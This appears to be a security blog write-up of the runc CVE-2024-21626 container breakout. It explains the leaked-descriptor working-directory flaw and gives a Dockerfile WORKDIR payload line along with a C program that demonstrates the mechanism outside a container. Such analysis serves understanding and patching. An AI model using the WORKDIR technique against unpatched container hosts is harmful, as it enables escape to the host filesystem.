runc process.cwd & leaked fds container breakout [CVE-2024-21626]
It's long been a classic to abuse accidentally exposed file descriptors through /proc/self/fd/
to break out of sandboxes, so it's kinda fun to see the same class of bug land in runc, the container runtime underneath Docker, enabling a container breakout either at run time or during an image build.
As you would expect, runc closes its own file descriptors that point back into the host before handing control to the final sandboxed process. The catch in affected versions (runc 1.1.11 and earlier, fixed in 1.1.12) is ordering: runc chdir()s to the configured working directory (process.cwd in the OCI config, which is what a Dockerfile WORKDIR becomes) while an internal descriptor to a host directory (the host's /sys/fs/cgroup) is still open. A working directory is a reference the kernel keeps for the process independently of the descriptor table, so if cwd names that descriptor through the /proc magic link, the reference survives runc's later close(). In a Dockerfile that looks like:

WORKDIR /proc/self/fd/5

(5 is a made-up descriptor number; the real one depends on the runc version and environment, so this is probably not a working payload as-is.)
With that reference held, the process starts with a working directory on the host filesystem rather than inside the container rootfs, and a plain chdir("..") walks up out of it into the host root: the confines of the container filesystem have been escaped. The same trick applies at run time to anyone who can set process.cwd, for example via runc exec --cwd or by shipping an image whose config carries that WORKDIR.
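To make the mechanism concrete, here is an added C example (mine, not runc's code and not the original finder's payload) that reproduces the sequence outside any container: open a directory fd standing in for runc's leaked host fd, chdir() to /proc/self/fd/N the way runc honoured process.cwd, close the fd as runc did before exec, and then confirm the working directory is still that directory and that ".." climbs from it to the root. It assumes a Linux host with procfs mounted; the directory passed in is just a stand-in for the host cgroup directory.

```c
#define _GNU_SOURCE
#include <errno.h>
#include <fcntl.h>
#include <limits.h>
#include <stdio.h>
#include <string.h>
#include <unistd.h>

/*
 * Illustration of the CVE-2024-21626 mechanism, run outside a container.
 * Not runc's code: `dir` stands in for the host directory runc's leaked
 * fd pointed at.
 *
 *  1. a directory fd is open in the process (runc's leaked host fd),
 *  2. the process chdir()s to /proc/self/fd/<n>, as runc did for
 *     process.cwd / WORKDIR before closing its descriptors,
 *  3. the fd is closed, as runc did before exec,
 *  4. the working directory is still that directory, and ".." climbs
 *     to the root of the filesystem it lives on.
 *
 * Returns the number of chdir("..") steps needed to reach "/" from the
 * adopted directory, or -1 on error. The adopted cwd is written to *adopted.
 */
int escape_via_leaked_fd(const char *dir, char *adopted, size_t adopted_len)
{
    char saved[PATH_MAX], link[64], cur[PATH_MAX];
    int fd, steps = 0;

    if (getcwd(saved, sizeof saved) == NULL)
        return -1;

    /* step 1: the "leaked" descriptor */
    fd = open(dir, O_RDONLY | O_DIRECTORY);
    if (fd < 0)
        return -1;

    /* step 2: chdir through the magic link, exactly what a cwd of
     * "/proc/self/fd/N" made runc do */
    snprintf(link, sizeof link, "/proc/self/fd/%d", fd);
    if (chdir(link) != 0) {
        close(fd);
        return -1;
    }

    /* step 3: the descriptor goes away; confirm it is really gone */
    close(fd);
    if (fcntl(fd, F_GETFD) != -1 || errno != EBADF)
        return -1;

    /* step 4: cwd is unaffected by the close and still names `dir` */
    if (getcwd(adopted, adopted_len) == NULL)
        return -1;

    while (steps < PATH_MAX) {            /* bounded so a weird fs can't loop us */
        if (getcwd(cur, sizeof cur) == NULL)
            return -1;
        if (strcmp(cur, "/") == 0)
            break;
        if (chdir("..") != 0)
            return -1;
        steps++;
    }

    if (chdir(saved) != 0)                /* leave the caller where it started */
        return -1;
    return steps;
}

/* Helper for checks: 1 if adopting `dir` yields exactly that cwd after the
 * fd is closed and the climb to "/" takes `expected_steps`. */
int escape_matches(const char *dir, int expected_steps)
{
    char where[PATH_MAX];
    int n = escape_via_leaked_fd(dir, where, sizeof where);
    return n == expected_steps && strcmp(where, dir) == 0;
}

int main(void)
{
    char where[PATH_MAX];
    int n = escape_via_leaked_fd("/proc/sys/kernel", where, sizeof where);
    if (n < 0) {
        perror("escape_via_leaked_fd");
        return 1;
    }
    printf("cwd after the fd was closed: %s (%d x '..' to reach /)\n", where, n);
    return 0;
}
```

The point the demo makes is the one that matters for the fix: closing the descriptor after the chdir() is too late, because the cwd reference is held by the kernel, not by the fd table. Inside a real container the adopted directory would be outside the container's rootfs, so the ".." walk ends at the host's root rather than the container's.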